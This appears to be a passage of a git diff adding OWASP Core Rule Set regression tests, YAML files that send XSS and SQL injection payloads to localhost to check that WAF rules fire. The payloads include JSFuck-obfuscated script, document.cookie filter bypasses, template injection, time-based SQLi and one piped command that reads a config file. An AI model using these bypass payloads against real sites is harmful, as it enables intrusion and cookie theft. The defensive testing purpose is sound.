"a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" + # Payload represents "alert(1)" in JSFuck encoding + version: HTTP/1.1 + output: + log_contains: id "941360" + - test_title: 941360-2 + desc: "JSFuck / Hieroglyphy payload obfuscation attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "a=(![]+[])[+!+[]]" + # Payload represents "a" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log_contains: id "941360" + - test_title: 941360-3 + desc: "JSFuck / Hieroglyphy payload obfuscation attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "a=+!![]" + # Payload represents "1" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log_contains: id "941360" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml new file mode 100644 index 00000000..b1e5f383 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml @@ -0,0 +1,167 @@ +--- +meta: + author: "Andrea Menin" + description: None + enabled: true + name: 941370.yaml +tests: + - test_title: 941370-1 + desc: "Bypass using comment in syntax and multiple whitespaces" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-2 + desc: "Bypass using comments in syntax" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-3 + desc: "Bypass using JavaScript global variables" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-4 + desc: "Bypass using JavaScript global variables and comments in syntax" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-5 + desc: "Bypass using JavaScript global variables and string concatenation" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-6 + desc: "Bypass using JavaScript global variables and comments in syntax" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-7 + desc: "Bypass using JavaScript global variables and jQuery globalEval" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-8 + desc: "Bypass using JavaScript global variables and hex escape sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=self%5B%22%5Cx24%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-9 + desc: "Bypass trying to access document.cookie using alternative syntax like (document)['cookie']" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=%28document%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-10 + desc: "Bypass trying to access document.cookie using alternative syntax and comments like (document/*foo*/)['cookie']" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml new file mode 100644 index 00000000..48c4ed59 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml @@ -0,0 +1,24 @@ +--- +meta: + author: "Franziska Buehler" + description: None + enabled: true + name: 941380.yaml +tests: + - test_title: 941380-1 + desc: "AngularJS client side template injection detection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff' + # /login?user={{constructor.constructor('alert(1)')()}} + version: HTTP/1.1 + output: + log_contains: id "941380" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml new file mode 100644 index 00000000..fd208ee7 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml @@ -0,0 +1,151 @@ +--- +meta: + author: "Franziska Buehler, Xhoenix" + description: None + enabled: true + name: 941390.yaml +tests: + - test_title: 941390-1 + desc: "JavaScript method setInterval(code, 1)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=setInterval%28code%2C%201%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-2 + desc: "JavaScript method: arg=x\";setTimeout(name, 1)//" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=x%22%3BsetTimeout%28name%2C%201%29%2F%2F' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-3 + desc: "JavaScript method eval('2 + 2')" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=eval%28%272%20%2B%202%27%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-4 + desc: "JavaScript constructor new Function()" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=new%20Function%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-5 + desc: "JavaScript call alert" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=alert%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-6 + desc: "JavaScript call atob" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=atob%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-7 + desc: "JavaScript call btoa" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?arg=btoa%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-8 + desc: "JavaScript call prompt" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get?arg=prompt%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_title: 941390-9 + desc: "JavaScript call confirm" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get?arg=confirm%28%29' + version: HTTP/1.1 + output: + log_contains: id "941390" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml new file mode 100644 index 00000000..80807d76 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml @@ -0,0 +1,119 @@ +--- +meta: + author: "Andrea Menin" + description: None + enabled: true + name: 941400.yaml +tests: + - test_title: 941400-1 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=%5B%5D.sort.call%60%24%7Balert%7D1337%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-2 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=%5B%20%20%5D%20.%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-3 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=%5B%20%20%5D%20.%20%2F%2A%2A%2F%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-4 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=%5B%5D.map.call%60%24%7Beval%7D%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-5 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=%5B%201234%20%5D.%20map%20.%20call%60%24%7Beval%7D%2F%2A%20asd%20%2A%2F%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-6 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=Reflect.apply.call%60%24%7Bnavigation.navigate%7D%24%7Bnavigation%7D%24%7B%5Bname%5D%7D%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-7 + desc: "Status Page Test - JavaScript minimal test with Reflect.sort.call``" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?test=Reflect.sort.call%60%60' + version: HTTP/1.1 + output: + log_contains: id "941400" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml new file mode 100644 index 00000000..7127cc95 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml @@ -0,0 +1,245 @@ +--- +meta: + author: "Christian Folini" + description: Various SQL injection tests + enabled: true + name: 942100.yaml +tests: + - test_title: 942100-1 + desc: "Simple SQL Injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=1234 OR 1=1" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-2 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=-1839' or '1'='1" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-3 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=-1839\" or \"1\"=\"2" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-4 + desc: "Basic SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-5 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=EmptyValue' and 526=527" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-6 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=foo') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-7 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-8 + desc: "Simple SQL Injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-9 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-10 + desc: "Advanced SQL Injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "1'||(select extractvalue(xmltype('%toyop;" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-11 + desc: "Simple function call" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=sleep(20)" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-12 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-13 + desc: "Advanced injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=\" | type %SystemDrive%\\\\config.ini | \"" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-14 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" + version: HTTP/1.0 + output: + log_contains: id "942100" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml new file mode 100644 index 00000000..8b685625 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml @@ -0,0 +1,183 @@ +--- +meta: + author: "Christian Folini, Matteo Pace" + description: Various SQL injection tests + enabled: true + name: 942101.yaml +tests: + - test_title: 942101-1 + desc: "Simple SQL Injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/1234%20OR%201=1" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-2 + desc: "Basic SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-3 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/EmptyValue'%20and%20526=527" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-4 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-5 + desc: "Simple function call" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/sleep(20)" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-6 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-7 + desc: "SQL Injection at the last segment of the path (request_basename detection)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/foo/24'union+all+select+1,2,3+from+aa" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-8 + desc: "SQL Injection inside the path (request_filename detection)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/foo/24'union+all+select+1,2,3+from+aa/bar" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-9 + desc: "SQL Injection inside the path with comment block (request_filename detection)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/%2A/%2A/2+union+all/bar" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-10 + desc: "Negative test with incomplete SQL command inside the path" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/foo/9'union+all/bar" + version: HTTP/1.0 + output: + no_log_contains: id "942101" + - test_title: 942101-11 + desc: "Negative test with complete SQL command inside the path, but without comma" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/foo/24+union+all+select+1,2,3+from+aa/bar" + version: HTTP/1.0 + output: + no_log_contains: id "942101" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942110.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942110.yaml new file mode 100644 index 00000000..40a2e88b --- /dev/null +++ 